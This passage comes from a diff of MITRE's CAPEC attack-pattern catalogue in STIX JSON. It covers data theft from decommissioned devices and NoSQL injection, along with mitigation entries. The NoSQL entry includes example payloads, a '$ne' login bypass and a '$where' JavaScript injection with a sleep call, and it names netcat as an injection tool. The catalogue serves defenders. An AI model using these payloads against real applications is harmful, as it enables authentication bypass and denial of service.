"description": "Ensure that each supplier performing hardware development implements comprehensive, security-focused configuration management including for FPGA programming and program uploads to FPGA chips.", + "id": "course-of-action--d9c23bac-b643-4817-b0e5-0b21f4c2dae6", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-674-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--df0ce1ec-3322-4b0a-9e1d-fa7dcddce433", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d9c23bac-b643-4817-b0e5-0b21f4c2dae6", + "spec_version": "2.1", + "target_ref": "attack-pattern--fcd0d50b-dab4-435d-859e-19514b4e646e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--228b9edf-0a87-42c6-b3df-817ef320b28f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bbe1a74c-b985-4607-a7aa-6a9cbf724b87", + "spec_version": "2.1", + "target_ref": "attack-pattern--fcd0d50b-dab4-435d-859e-19514b4e646e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e4f482f0-9628-4ce5-bf90-cc5a98776506", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0b60f2ad-a597-4f6d-8433-af47d2743270", + "spec_version": "2.1", + "target_ref": "attack-pattern--fcd0d50b-dab4-435d-859e-19514b4e646e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary obtains decommissioned, recycled, or discarded systems and devices that can include an organization’s intellectual property, employee data, and other types of controlled information. Systems and devices that have reached the end of their lifecycles may be subject to recycle or disposal where they can be exposed to adversarial attempts to retrieve information from internal memory chips and storage devices that are part of the system.\n ", + "external_references": [ + { + "external_id": "CAPEC-675", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/675.html" + }, + { + "external_id": "CWE-1266", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1266.html" + }, + { + "description": "Exfiltration Over Physical Medium", + "external_id": "T1052", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1052" + }, + { + "description": "Richard Kissel, Andrew Regenscheid, Matthew Scholl, Kevin Stine, NIST Special Publication 800-88 Revision 1: Guidelines for Media Sanitization, 2014--12, National Institute of Standards and Technology", + "external_id": "REF-663", + "source_name": "reference_from_CAPEC", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-88r1.pdf" + }, + { + "description": "Linda Pesante, Christopher King, George Silowash, Disposing of Devices Safely, 2012, CISA United States Computer Emergency Readiness Team (US-CERT)", + "external_id": "REF-717", + "source_name": "reference_from_CAPEC", + "url": "https://www.cisa.gov/uscert/sites/default/files/publications/DisposeDevicesSafely.pdf" + } + ], + "id": "attack-pattern--a8b4faf6-2e52-434f-95a4-df5f9bdc985a", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Retrieve Data from Decommissioned Devices", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--756a1a93-3734-426c-9e91-f9339de74a7a" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--55ce63d0-6143-4b95-b70c-87c5b60aafa8" + ], + "x_capec_child_of_refs": [ + "attack-pattern--913426fa-ea1f-43b0-8492-1d363ea109d6" + ], + "x_capec_consequences": { + "Accountability": [ + "Bypass Protection Mechanism" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Software", + "Physical Security", + "Hardware" + ], + "x_capec_example_instances": [ + "\n A company is contracted by an organization to provide data destruction services for solid state and hard disk drives being discarded. Prior to destruction, an adversary within the contracted company copies data from select devices, violating the data confidentiality requirements of the submitting organization.\n " + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "An adversary needs to have access to electronic data processing equipment being recycled or disposed of (e.g., laptops, servers) at a collection location and the ability to take control of it for the purpose of exploiting its content." + ], + "x_capec_skills_required": { + "High": "An adversary may need the ability to mount printed circuit boards and target individual chips for exploitation.", + "Medium": "An adversary needs the technical skills required to extract solid state drives, hard disk drives, and other storage media to host on a compatible system or harness to gain access to digital content." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Backup device data before erasure to retain intellectual property and inside knowledge.", + "id": "course-of-action--768de10a-6dae-46e1-88e8-fac5a8033e51", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-675-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--03ca0e49-f51b-444a-bfae-ac04853513a4", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--768de10a-6dae-46e1-88e8-fac5a8033e51", + "spec_version": "2.1", + "target_ref": "attack-pattern--a8b4faf6-2e52-434f-95a4-df5f9bdc985a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Overwrite data on device rather than deleting. Deleted data can still be recovered, even if the device trash can is emptied. Rewriting data removes any trace of the old data. Performing multiple overwrites followed by a zeroing of the device (overwriting with all zeros) is good practice.", + "id": "course-of-action--818359f4-4568-4bf9-ad3f-7eb90981e184", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-675-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--29b103ab-eae1-46f7-8c4c-18b3567ab7d7", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--818359f4-4568-4bf9-ad3f-7eb90981e184", + "spec_version": "2.1", + "target_ref": "attack-pattern--a8b4faf6-2e52-434f-95a4-df5f9bdc985a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use a secure erase software.", + "id": "course-of-action--bf22f1fa-b5cb-4733-a825-810c681f76aa", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-675-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--006acdf6-fa11-4dbc-b447-35cfd3577991", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bf22f1fa-b5cb-4733-a825-810c681f76aa", + "spec_version": "2.1", + "target_ref": "attack-pattern--a8b4faf6-2e52-434f-95a4-df5f9bdc985a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Physically destroy the device if it is not intended to be reused. Using a specialized service to disintegrate, burn, melt or pulverize the device can be effective, but if those services are inaccessible, drilling nails or holes, or smashing the device with a hammer can be effective. Do not burn, microwave, or pour acid on a hard drive.", + "id": "course-of-action--4b4bbf38-311c-44cf-b12d-6b86aa64c42f", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-675-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ca3fdcd4-4c53-4c80-b0bc-99ed5fc92cf2", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4b4bbf38-311c-44cf-b12d-6b86aa64c42f", + "spec_version": "2.1", + "target_ref": "attack-pattern--a8b4faf6-2e52-434f-95a4-df5f9bdc985a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Physically destroy memory and SIM cards for mobile devices not intended to be reused.", + "id": "course-of-action--388e0698-f2f5-4a1e-9c92-8446aeb9bf7a", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-675-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--74fd4f17-afa6-4329-9ea8-ddc1e2e6d43b", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--388e0698-f2f5-4a1e-9c92-8446aeb9bf7a", + "spec_version": "2.1", + "target_ref": "attack-pattern--a8b4faf6-2e52-434f-95a4-df5f9bdc985a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that the user account has been terminated or switched to a new device before destroying.", + "id": "course-of-action--c28595a5-c39f-414b-9c5d-1907e7202d7d", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-675-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--eb3df538-c4c4-4672-aef8-3908c2fce1fc", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c28595a5-c39f-414b-9c5d-1907e7202d7d", + "spec_version": "2.1", + "target_ref": "attack-pattern--a8b4faf6-2e52-434f-95a4-df5f9bdc985a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary targets software that constructs NoSQL statements based on user input or with parameters vulnerable to operator replacement in order to achieve a variety of technical impacts such as escalating privileges, bypassing authentication, and/or executing code.\n ", + "external_references": [ + { + "external_id": "CAPEC-676", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/676.html" + }, + { + "external_id": "CWE-943", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/943.html" + }, + { + "external_id": "CWE-1286", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1286.html" + }, + { + "description": "Testing for NoSQL Injection, The OWASP Foundation", + "external_id": "REF-668", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.6-Testing_for_NoSQL_Injection" + }, + { + "description": "Charlie Belmer, NoSql Injection Cheatsheet, 2021--06---07, Null Sweep", + "external_id": "REF-669", + "source_name": "reference_from_CAPEC", + "url": "https://nullsweep.com/nosql-injection-cheatsheet/" + }, + { + "description": "Patrick Spiegel, NoSql Injection: Fun with Objects and Arrays, The OWASP Foundation", + "external_id": "REF-670", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-pdf-archive/GOD16-NOSQL.pdf" + }, + { + "description": "NoSql Injection: Fun with Objects and ArraysNoSQL Injection Attacks and Prevention Techniques, 2019--06, WebOrion", + "external_id": "REF-671", + "source_name": "reference_from_CAPEC", + "url": "https://www.theweborion.com/wp-content/uploads/2019/06/NoSQL-Injection-Attacks-and-Prevention-Techniques.pdf" + } + ], + "id": "attack-pattern--9d435b55-e3ef-4a19-be67-c3350f20e44e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "NoSQL Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--70c8a212-72da-4a98-a626-e5d38e5416e3" + ], + "x_capec_child_of_refs": [ + "attack-pattern--2fb2b2b8-b7de-45a2-aadb-5849d12fda8f" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n The following examples primarily cite MongoDB, PHP, and NodeJS attacks due to their prominence and popularity. However, please note that these attacks are not exclusive to this NoSQL instance, programming language, or runtime framework.\n Within NodeJS, Login Bypass attacks are possible via MongoDB if user-input is not properly validated and sanitized [REF-670].\n //NodeJS with Express.jsdb.collection('users').find({\"user\": req.query.user,\"password\": req.query.password});\n \n \n The above code works fine if the user were to submit a query like the following:\n https://example.org/login?user=patrick&password=1234\n \n But an adversary could submit a malicious query such as the below, which would be interpreted by the code as follows:\n https://example.org/login?user=patrick&password[$ne]=\n //NodeJS with Express.jsdb.collection('users').find({\"user\": bob,\"password\": {\"&ne\": \"\"}});\n \n This will result in a Login Bypass attack, as the query will succeed for all values where Bob's password is not an empty string.\n ", + "\n MongoDB instances are also vulnerable to JavaScript Injection Attacks when user input is not properly validated and sanitized.\n //PHP with MongoDBdb.collection.find({$where: function() {return (this.username == $username) } } );\n \n \n \n If the user properly specifies a username, then this code will execute as intended. However, an adversary can inject JavaScript into the \"$username\" variable to achieve a NoSQL Injection attack as follows:\n //PHP with MongoDBdb.collection.find({$where: function() {return (this.username == 'foo'; sleep(5000) ) } } );\n \n \n This will result in the server sleeping for 5 seconds if the attack was successful. An adversary could supply a larger value to deny service to the application.\n ", + "\n If leveraging PHP with MongoDB, operator replacement attacks are possible if special query operators are not properly addressed. The below example from OWASP's \"Test for NoSQL Injection\" displays a simple case of how this could occur.[REF-668]\n db.myCollection.find({$where: function() {return obj.credits - obj.debits < 0; } } );\n \n \n Even though the above query does not depend on any user input, it is vulnerable to a NoSQL injection attack via operator replacement on the \"$where\" keyword. In this case, the adversary could exploit MongoDB in the following manner:\n $where: function() { //arbitrary JavaScript here }\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey target application: Due to the number of NoSQL databases available and the numerous language/API combinations of each, the adversary must first survey the target application to learn what technologies are being leveraged and how they interact with user-driven data.

    2. Techniques
    Determine the technology stack leveraged by the target application, such as the application server, drivers, frameworks, APIs, and databases being utilized.
    Identify areas of the application that interact with user input and may be involved with NoSQL queries.

Experiment

  1. Identify user-controllable input susceptible to injection: After identifying the technology stack being used and where user-driven input is leveraged, determine the user-controllable input susceptible to injection such as authentication or search forms. For each user-controllable input that the adversary suspects is vulnerable to NoSQL injection, attempt to inject characters or keywords that have special meaning in the given NoSQL database or language (e.g., \"$ne\" for MongoDB or \"$exists\" for PHP/MongoDB), or JavaScript that can be executed within the application. The goal is to create a NoSQL query with an invalid syntax.

    2. Techniques
    Use web browser to inject input through text fields or through HTTP GET parameters.
    Use a web application debugging tool such as Tamper Data, TamperIE, WebScarab,etc. to modify HTTP POST parameters, hidden fields, non-freeform fields, etc.
    Use network-level packet injection tools such as netcat to inject input
    Use modified client (modified by reverse engineering) to inject input.

  2. Experiment with NoSQL Injection vulnerabilities: After determining that a given input is vulnerable to NoSQL Injection, hypothesize what the underlying query looks like. Iteratively try to add logic to the query to extract information from the database, modify/delete information in the database, or execute commands on the server.

    3. Techniques
    Use public resources such as OWASP's \"Testing for NoSQL Injection\" [REF-668] or Null Sweep's \"NoSQL Injection Cheatsheet\" [REF-669] and try different approaches for adding logic to NoSQL queries.
    Iteratively add logic to the NoSQL query and use detailed error messages from the server to debug the query.
    Attempt an HTTP Parameter Pollution attack to replace language-specific keywords, such as \"where\" within PHP [CAPEC-460].

Exploit

  1. Exploit NoSQL Injection vulnerability: After refining and adding various logic to NoSQL queries, craft and execute the underlying NoSQL query that will be used to attack the target system.

    2. Techniques
    Craft and Execute underlying NoSQL query
", + "x_capec_extended_description": "\n NoSQL database calls are written in an application's programming language, via a custom API call, or formatted in a common convention (e.g., JSON, XML, etc.), any of which the adversary can exploit to achieve the aforementioned goals. NoSQL attacks usually result from improper sanitization and validation of data that originates from a user, either via special character or JavaScript injection. In both cases, the adversary crafts input strings so that when the target software constructs NoSQL statements based on the input, the resulting NoSQL statement performs actions other than those intended by the application. However, unlike traditional SQL Injection attacks, NoSQL injection attacks can also occur in instances where the application does not rely upon user input, as is the case in operator replacements. This entails the adversary overriding reserved NoSQL variable names with ones that have been modified with malicious functionality (e.g., $where in MongoDB). In all cases, depending on the NoSQL API and data model used, successful injection can cause information disclosure, data modification, and code execution at the application level.\n Note: NoSQL Injection attacks are executed within a procedural language (e.g., C, C++, Perl), as opposed to the declarative SQL language itself. As a result, NoSQL injection attacks can potentially result in greater impacts than traditional SQL Injection attacks [REF-668].\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Awareness of the technology stack being leveraged by the target application.", + "NoSQL queries used by the application to store, retrieve, or modify data.", + "User-controllable input that is not properly validated by the application as part of NoSQL queries.", + "Target potentially susceptible to operator replacement attacks." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "For keyword and JavaScript injection attacks, it is fairly simple for someone with basic NoSQL knowledge to perform NoSQL injection, once the target's technology stack has been determined.", + "Medium": "For operator replacement attacks, the adversary must also have knowledge of HTTP Parameter Pollution attacks and how to conduct them." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Strong input validation - All user-controllable input must be validated and filtered for illegal characters as well as relevant NoSQL and JavaScript content. NoSQL-specific keywords, such as $ne, $eq or $gt for MongoDB, must be filtered in addition to characters such as a single-quote(') or semicolons (;) based on the context in which they appear. Validation should also extend to expected types.", + "id": "course-of-action--c3e9e3ff-9ab8-46b9-8bd2-7d63b43a2ef4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-676-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--869ea0bd-ba58-497e-ba60-bb6b4e05a203", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c3e9e3ff-9ab8-46b9-8bd2-7d63b43a2ef4", + "spec_version": "2.1", + "target_ref": "attack-pattern--9d435b55-e3ef-4a19-be67-c3350f20e44e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "If possible, leverage safe APIs (e.g., PyMongo and Flask-PyMongo for Python and MongoDB) for queries as opposed to building queries from strings.", + "id": "course-of-action--c36658ef-ec56-451f-9d0f-cc4e8364709e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-676-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d13883d0-b82e-40df-b760-850af2e151e9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c36658ef-ec56-451f-9d0f-cc4e8364709e", + "spec_version": "2.1", + "target_ref": "attack-pattern--9d435b55-e3ef-4a19-be67-c3350f20e44e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure the most recent version of a NoSQL database and it's corresponding API are used by the application.", + "id": "course-of-action--f535cf43-16c4-4702-82b4-f2ad54457382", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-676-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ba86a192-07aa-4b27-be1a-28cd2e920662", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f535cf43-16c4-4702-82b4-f2ad54457382", + "spec_version": "2.1", + "target_ref": "attack-pattern--9d435b55-e3ef-4a19-be67-c3350f20e44e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use of custom error pages - Adversaries can glean information about the nature of queries from descriptive error messages. Input validation must be coupled with customized error pages that inform about an error without disclosing information about the database or application.", + "id": "course-of-action--4c849df7-9814-41f1-b257-5be9d1636087", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-676-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1126520b-05be-455e-9d4d-a4bcf7ce2218", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4c849df7-9814-41f1-b257-5be9d1636087", + "spec_version": "2.1", + "target_ref": "attack-pattern--9d435b55-e3ef-4a19-be67-c3350f20e44e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Exercise the principle of Least Privilege with regards to application accounts to minimize damage if a NoSQL injection attack is successful.", + "id": "course-of-action--7f433708-ce26-4500-81a0-5a94a7fe8032", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-676-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ec6f7349-8700-4bcc-a21a-24391221b7c8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7f433708-ce26-4500-81a0-5a94a7fe8032", + "spec_version": "2.1", + "target_ref": "attack-pattern--9d435b55-e3ef-4a19-be67-c3350f20e44e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "If using MongoDB, disable server-side JavaScript execution and leverage a sanitization module such as \"mongo-sanitize\".", + "id": "course-of-action--3aa6e395-8929-42e8-96db-20d559ee7c77", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-676-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5101e2fb-b215-4be6-857a-0e5c8aa7341c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3aa6e395-8929-42e8-96db-20d559ee7c77", + "spec_version": "2.1", + "target_ref": "attack-pattern--9d435b55-e3ef-4a19-be67-c3350f20e44e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "If using PHP with MongoDB, ensure all special query operators (starting with $) use single quotes to prevent operator replacement attacks.", + "id": "course-of-action--3753e389-6551-4beb-a945-aa3c36831232", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-676-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ce0040af-39bd-44c9-b2a6-d529ca6a642d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3753e389-6551-4beb-a945-aa3c36831232", + "spec_version": "2.1", + "target_ref": "attack-pattern--9d435b55-e3ef-4a19-be67-c3350f20e44e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Additional mitigations will depend on the NoSQL database, API, and programming language leveraged by the application.", + "id": "course-of-action--514cd9bd-12f1-4cf8-9093-4f575517aa3b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-676-7", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3626f089-3a82-4044-85fc-50f2f7def667", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": 